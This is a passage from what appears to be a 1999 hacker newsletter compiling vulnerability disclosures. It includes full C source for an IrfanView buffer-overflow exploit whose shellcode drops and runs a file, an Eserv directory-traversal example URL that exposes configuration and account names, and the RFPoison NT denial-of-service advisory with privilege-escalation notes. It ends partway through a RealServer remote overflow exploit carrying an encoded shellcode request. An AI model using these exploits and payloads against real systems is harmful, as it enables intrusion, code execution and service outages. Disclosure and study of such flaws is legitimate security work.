by BHZ Monday 6th November 1999 on 11:02 pm CET
The popular Image viewer "Irfan View32" contains the buffer overflow
problem, this problem exists in the handling of Adobe Photoshop
image file. Irfan view checks the image type by the image header, if
"8BPS" pattern is found in the header, Irfan view judges this file as
Photo Shop image. The overflow happens at the handling of reading
this marker. Cool one, isn't it:).
Link: Packet Storm
http://packetstorm.securify.com/9911-exploits/irfan.view32.txt
The popular Image viewer "Irfan View32" contains the buffer overflow
problem, this problem exists in the handling of Adobe Photoshop image
file. Irfan view checks the image type by the image header, if "8BPS"
pattern is found in the header, Irfan view judges this file as Photo
Shop image. We think the overflow happens at the handling of reading
this marker.
You can see the GPF dialog box by the following file.
8BPSaaaaaaaaaaaaaa .... long 'a'
#You can make this file by notepad.exe
This overflow is exploitable if the appropriate value is stored in the
stack area, any codes such as virus, trojans, destruction code, which is
stored in the image file can be executed.
This fact means that the danger also exists on downloding the image
files and viewing them. Of course, there is a possibility of such danger
also in other software such as movie players, audio players. We coded
the following sample codes. This code generates the jpg file which
contains the exploit code that generates "exp.com" in "c:\" and executes
it("exp.com" is a simple demo program, there is no danger).
This is tested on Japanese Windows98 only.
---
/*=============================================================================
Irfan View 3.07 Exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
#define MAXBUF 0x22e0
#define RETADR 0x31E
#define FAKE_ADR 0x80101010 // Writable buffer pointer
#define JMPESP_ADR 0xbffca4f7 // You have to change this value
// for non-Japanese Windows98.
#define HEAD "8BPS\0"
unsigned char exploit_code[300]={
0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00
};
s
// "exp.com"
unsigned char exploit_data[1000]={
0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
0x20,0x77,0xf1,0xeb,0xf1,0x00
};
int GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};
char string_buffer[1000] ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
char filename[100] = "c:\\exp.com";
main(int argc,char *argv[])
{
unsigned char buf[MAXBUF],l1,l2;
unsigned int ip,p1,p2,i;
FILE *fp;
if (argc<2){
printf("usage : %s outputfile\n",argv[0]);
exit(1);
}
memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
memcpy(buf,HEAD,4);
ip=JMPESP_ADR;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[RETADR+6]=0xeb;
buf[RETADR+7]=0x04;
ip=FAKE_ADR;
buf[RETADR+8]=ip&0xff;
buf[RETADR+9]=(ip>>8)&0xff;
buf[RETADR+10]=(ip>>16)&0xff;
buf[RETADR+11]=(ip>>24)&0xff;
p1=(unsigned int)LoadLibrary;
p2=(unsigned int)GetProcAddress;
exploit_code[0x1f]=p1&0xff;
exploit_code[0x20]=(p1>>8)&0xff;
exploit_code[0x21]=(p1>>16)&0xff;
exploit_code[0x22]=(p1>>24)&0xff;
for (i=0;i<4;i++){
exploit_code[GetProcAddress_fcp[i] ]=p2&0xff;
exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff;
exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff;
exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff;
}
l1=strlen(filename)+strlen(string_buffer);
l2=strlen(exploit_data);
strcat(string_buffer,filename );
strcat(string_buffer,"_" );
strcat(string_buffer,exploit_data );
strcat(exploit_code, string_buffer );
exploit_code[0x1c] = l1;
exploit_code[0x6d] = l2;
exploit_code[0x77] = l1+1;
memcpy(buf+RETADR+12,exploit_code,strlen(exploit_code));
if ((fp=fopen(argv[1],"wb"))==NULL){
printf("Can not write file '%s'\n",argv[1]);
exit(1);
}
fwrite(buf,1,MAXBUF,fp);
fclose(fp);
printf("Done.\n");
return FALSE;
}
-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
shadowpenguin@backsection.net (webmaster)
% eEye Digital Security Team [ http://www.eEye.com ]
unyun@eEye.com
@HWA
48.0 Eserv 2.50 Web interface Server Directory Traversal Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://packetstorm.securify.com/
From owner-news@technotronic.com Thu Nov 4 22:28:55 1999
Return-Path: <owner-news@technotronic.com>
Received: from sword.damocles.com([209.100.46.1]) (3359 bytes) by packetstorm.securify.com
via sendmail with P:esmtp/D:user/T:local
(sender: <owner-news@technotronic.com>)
id <m11jcrl-0006CKb@packetstorm.securify.com>
for <packet@packetstorm.securify.com>; Thu, 4 Nov 1999 22:28:53 -0800 (PST)
(Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Sep-18)
Received: (from technomail@localhost)
by sword.damocles.com (8.9.1a/8.9.1) id UAA16404
for news-resend-technotroniccom; Thu, 4 Nov 1999 20:42:27 -0600
X-Authentication-Warning: sword.damocles.com: technomail set sender to owner-news@technotronic.com using -f
Received: from sword.damocles.com (vacuum@sword.damocles.com [209.100.46.1])
by sword.damocles.com (8.9.1a/8.9.1) with SMTP id UAA16399
for <news@technotronic.com>; Thu, 4 Nov 1999 20:42:25 -0600
Date: Thu, 4 Nov 1999 20:42:25 -0600 (CST)
From: Vacuum <vacuum@technotronic.com>
X-Sender: vacuum@sword.damocles.com
To: news@technotronic.com
Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability
Message-ID: <Pine.LNX.3.96.991104203908.16094A-100000@sword.damocles.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-news@technotronic.com
Precedence: bulk
Status: RO
---------- Forwarded message ----------
Date: Thu, 4 Nov 1999 18:26:52 -0600
From: owner-news@technotronic.com
To: owner-news@technotronic.com
Subject: BOUNCE news@technotronic.com: Approval required:
>From vacuum@sword.damocles.com Thu Nov 4 18:26:51 1999
Received: from ussrback.com (jupiter.hosting4u.net [209.15.2.9])
by sword.damocles.com (8.9.1a/8.9.1) with SMTP id SAA05681
for <news@technotronic.com>; Thu, 4 Nov 1999 18:26:46 -0600
Received: from luck ([200.41.64.206]) by ussrback.com ; Fri, 05 Nov 1999 00:26:32 -0600
From: "Ussr Labs" <labs@ussrback.com>
To: "TECHNOTRONIC" <news@technotronic.com>
Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability
Date: Thu, 4 Nov 1999 21:20:35 -0300
Message-ID: <NCBBKFKDOLAGKIAPMILPIEINCAAA.labs@ussrback.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
Eserv 2.50 Web interface Server Directory Traversal Vulnerability
Product:
Eserv/2.50 is the complete solution to access Internet from LAN:
- Mail Server (SMTP and POP3, with ability to share one mailbox
on the ISP, aliases and mail routing support)
- News Server (NNTP)
- Web Server (with CGI, virtual hosts, virtual directory support,
web-interface for all servers in the package)
- FTP Server (with virtual directory support)
- Proxy Servers
* FTP proxy and HTTP caching proxy
* FTP gate
* HTTPS proxy
* Socks5, Socks4 and 4a proxy
* TCP and UDP port mapping
* DNS proxy
- Finger Server
- Built-in scheduler and dialer (dial on demand,
dialer server for extern agents, scheduler for any tasks)
PROBLEM
UssrLabs found a Eserv Web Server Directory Traversal Vulnerability
Using the string '../' in a URL, an attacker can gain read access to
any file outside of the intended web-published filesystem directory
There is not much to expand on this one....
Example:
http://127.1:3128/../../../conf/Eserv.ini to show all configuration file
including
account names
Vendor Status:
no contacted
Vendor Url: http://www.eserv.ru/
Program Url: http://www.eserv.ru/eserv/
Credit: USSRLABS
SOLUTION
Nothing yet.
@HWA
49.0 RFP9906 - RFPoison
~~~~~~~~~~~~~~~~~~
From http://packetstorm.securify.com/
From rfp@wiretrip.net Mon Nov 1 09:20:06 1999
Date: Mon, 1 Nov 1999 08:18:50 -0600 (EST)
From: ".rain.forest.puppy." <rfp@wiretrip.net>
To: vacuum@technotronic.com, thegnome@nmrc.org
Subject: RFP9906 - RFPoison
--- Advisory RFP9906 ----------------------------- rfp.labs -----------
Windows NT remo
te denial of service and compromise
(RFPoison)
------------------------------ rain forest puppy / rfp@wiretrip.net ---
Table of contents:
- 1. Problem
- 2. Solution
- 3. Where to Get This Weapon of Mass Destruction
- 4. Miscellanous Updates (Important stuff!)
-----------------------------------------------------------------------
My website has been launched! Up to the minute advisories, tools, (and
code fixes...heh) are available from http://www.wiretrip.net/rfp/
-----------------------------------------------------------------------
----[ 1. Problem
Interesting on how things go around/come around. Recently Luke
Kenneth Casson Leighton posted a message on NTBugtraq in response to SP6
not fixing the LSA denial of service. He states that this problem is
essentially "due to marshalling/unmarshalling MSRPC code being unable to
cope with a NULL policy handle." He also states that they reported this
problem to Microsoft around February 1999.
Well, no, I did not 'rediscover' the LSA denial of service (ala
the AEDebug advisory earlier this month). I did, however, discover a
different denial of service based out of services.exe. When sent a
specific packet, it's possible to get srvsvc.dll to choke, and cause
services.exe to reference a bad memory location. For those geeks in the
crowd, essentially srvsvc_netrshareenum in srvsvc.dll uses
rpcrt4_ndrcomplexstructunmarshall to tweak a string, but returns a NULL.
srvsvc_netrshareenum doesn't check for return value, adds four to the
pointer, and passes it up a function stack until finally that memory is
read (address 00000004). Blam...Dr. Watson.
So we have another problem due to marshalling/unmarshalling MSRPC
code. This was found independantly of Luke's info and the LSA
vulnerability.
The impact is pretty severe. Services.exe handles named pipes for
the system. Once this crashes, everything named-pipe-based goes with it.
This means logons, logouts, remote system access (registry, server
functions, etc), local server management, IIS, file sharing, etc...all go
down the tube. However, the box will, for the most part, appear to
function normally on the local side, until you do something involving a
named pipe service. The only fix is to reboot...however, the shutdown
procedure waits for every (non-existant) service to respond to shutdown,
and timeout. On a typical box this could cause the full shutdown
procedure to push over a half-hour; therefore, hard reset is most likely
needed. Also, once in a great while the bug will 'survive' during a
reset. It may take two reboots to get the system back in order. Strange,
yes. How, I'm not sure. But it's happened over a half dozen times across
four separate boxes I've tested on.
Now, I'm sure some of you are thinking "well, denial of services
suck. How can I own .gov and .mil websites with this?" (hi flipz and
fuqrag)
Well, let's go back to David LeBlanc's response to RFP9903
(AEDebug advisory). He states, for AEDebug to really be a problem, you
have to "make something crash that has higher access rights than you do."
He also states "you've got to make a service go down that won't kill the
machine."
Bingo, this fits the bill. If we have access to change the
AEDebug registry key, we can set what programs to run on crash, set
autorun to True, and then crash services.exe. Our programs run as
Local_System, the box is still alive (TCP/IP-wise) and usable via netcat
and whatnot. A much more useful situation for a denial of service, don't
you think?
Also, Eric Schultze has detailed out many situations where someone
could have access to your AEDebug key. I suggest you read his tidbit.
It's posted as document 11 in the knowledge base on my website, available
at http://www.wiretrip.net/rfp/
So far, I have been able to use this exploit on NT 4.0 server and
workstation, with various levels of SP 1, 3, 5, and 6 service packs
installed. I even tried applying SP 5 with the following hotfixes (in the
following order): lsareq, ipsrfix, csrssfx, ioctlfx, and igmpfix. I've
also tried using the Security Configuration Editor on various different
'secure' system profiles, testing to see if perhaps a registry key
affected it. After all modifications, the systems were still susceptible.
HOWEVER, I do have reports of two boxes *NOT* being susceptible. The
reason for this, however, is unfound. Information will be released when
it is found. If you come across a situation where a box is impervious to
the exploit, PLEASE EMAIL ME. I would really appreciate the entire
install history of that particular system. Email to rfp@wiretrip.net.
----[ 2. Solution
Well, as previously stated, Luke and ISS informed Microsoft of the
LSA vulnerability in February 1999. To be fair, I also reported this
exact bug, along with the working exploit, to Microsoft on Oct 25th. Have
not hear a word. So, in the meantime, I can recommend two things:
- Block port 139 on your firewall. This, however, does not stop internal
attack.
- Turn off the Server service. While inconvenient, this should be deemed
as a temporary solution until Microsoft releases a patch. Just for
reference, shutting off the Server service will also shut down the
Computer Browser service. Glitch, a fellow Wiretrip member, describes the
functions of these services as follows:
SERVER: Used as the key to all server-side NetBIOS applications, this
service is somewhat needed. Without this service, some of the
administrative tools, such as Server Manager, could not be used. If remote
administration is not needed, I highly recommend disabling this service.
Contrary to popular belief, this service is NOT needed on a webserver.
COMPUTER BROWSER: The Computer Browser service is a function within
Microsoft networking for gathering and distributing resource information.
When active on a server, the server will register its name through a
NetBIOS broadcast or directly to a WINS server.
So you should note that turning these services off will disable the server
from participating in NetBIOS-related functions, including file sharing
and remote management. But realistically, how many servers need this?
Alternate means of content publishing (for webservers) exist (FTP and
-ugh- FrontPage). Of course this leaves the myriad of other services
though. I'd be interested to see how MS SQL fairs.
It's hoped that between the services.exe and the lsass.exe denial of
services, both based on bad RPC code, Microsoft will find this problem
worthy of fixing.
Now we wait...
----[ 3. Where to Get This Weapon of Mass Destruction
I use this title jokingly. But trust me, I have gone back and
forth about the release of this exploit. However, as a proponent of full
disclosure, I definately will release a working exploit. But I do so with
conditions:
- I will only release a Windows executable.
- The windows executable is coded to reboot (NT) or crash (9x) upon
successful execution. If you blow something up, you blow up too.
- A few checks that keep the program from running if you run in a user
context that does not allow the above 'safety features' to work.
But it is a working executable. I'm hoping this will at least curb the
script kiddie activity. Of course, I'm sure this program will be reversed
and a new version made within 6 hours of posting--but that's not my
problem. This should be more than enough to verify/test the exploit, and
I've provided the details of how it works and the solutions necessary for
stopping it. The skilled will be able to go off this, and the, well, the
abusers will hit the glass ceiling as intended. Thanks to Vacuum for
helping me come up with a responsible solution.
Also, I want to make it very clear, before I tell you where to get the
executable....
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
oh, and
DO NOT ASK ME FOR SOURCE.
I don't care who you are. All email asking for source will be instantly
deleted. I don't care if you send me the secret to life--if it has "p.s.
can I get the source?" I will pipe that thing to /dev/null, along with
whatever goodies you may have sent me. Don't even joke; you won't get a
reply.
Now that that's established, you can download RFPoison.exe from my
website (of course) at http://www.wiretrip.net/rfp/
----[ 4. Miscellaneous Updates (Important stuff!)
- whisker 1.2.0 has been released! Includes the ability to bounce scans
off of AltaVista (thanks to Philip Stoev) Plus some new feature additions,
and new scan scripts, including a comprehensive script for scanning
FrontPage (thanks to Sozni).
- flipz and fuqrag have been busy hacking .gov and .mil sites. Turns out
they're using a vanilla copy of msadc2.pl. Check out msadc2.pl (their
exploit) at my website.
- Zeus Technologies had an outstanding response to RFP9905. In under 12
hours they had a patched version available, and were all-around terrific in
their private and public response. As an indication of how they do
business, I would recommend Zeus Technologies as a vendor to anyone. Kudos
for them.
- technotronic and rfp.labs have teamed up! We're going to combine a couple
of resources--starting with the mailing list. Technotronic already puts out
some good info on his list...now I'll be giving the same list up to date
information on rfp.labs advisories, information, and other various cool
info. If you're not on it already, you may consider joining. Signup at
www.technotronic.com
- with the (sad?) end of octoberfest, I'm also pleased to see w00w00 take
over with 'w00giving'--all through the month of November w00w00 will be
releasing some more stuff! You can start looking for the first (of many)
advisories today (Nov 1st).
Special greetings to Simple Nomad (and others) on this special day where
the wheel finishes its cycle and starts its revolution anew.
--- rain forest puppy / rfp@wiretrip.net ----------- ADM / wiretrip ---
So what if I'm not elite. My mom says I'm special.
--- Advisory RFP9906 ----------------------------- rfp.labs -----------
@HWA
50.0 Realnetworks server bufferoverflow exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* RealNetworks RealServer G2 buffer overflow exploit
*
* by dark spyrit <dspyrit@beavuh.org>
* quick unix port by team teso
*
* the windows binary is available at http://www.beavuh.org.
*
* This exploits a buffer overflow in RealServers web authentication on
* the administrator port - hence the reason the shellcode is base64 encoded.
* This has been tested on the NT version with a default installation.
* If RealServer is installed in a different directory than the default, the
* buffer will need to be adjusted accordingly.
* The administrator port is randomly selected at installation, but as you'll
* only be testing on your own networks this won't matter :)
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
/* local functions
*/
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);
unsigned char sploit[] =
"GET /admin/index.html HTTP/1.0\x0d\x0a"
"Connection: Keep-Alive\x0d\x0a"
"User-Agent: Mozilla/4.04 [en] (X11; I; Beavuh OS .9 i486; Nav)\x0d\x0a"
"Host: 111.111.11.1:1111\x0d\x0a"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\x0d\x0a"
"Accept-Language: en\x0d\x0a"
"Accept-Charset: iso-8859-1,*,utf-8\x0d\x0a"
"Authorization: Basic kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
"JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
"QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
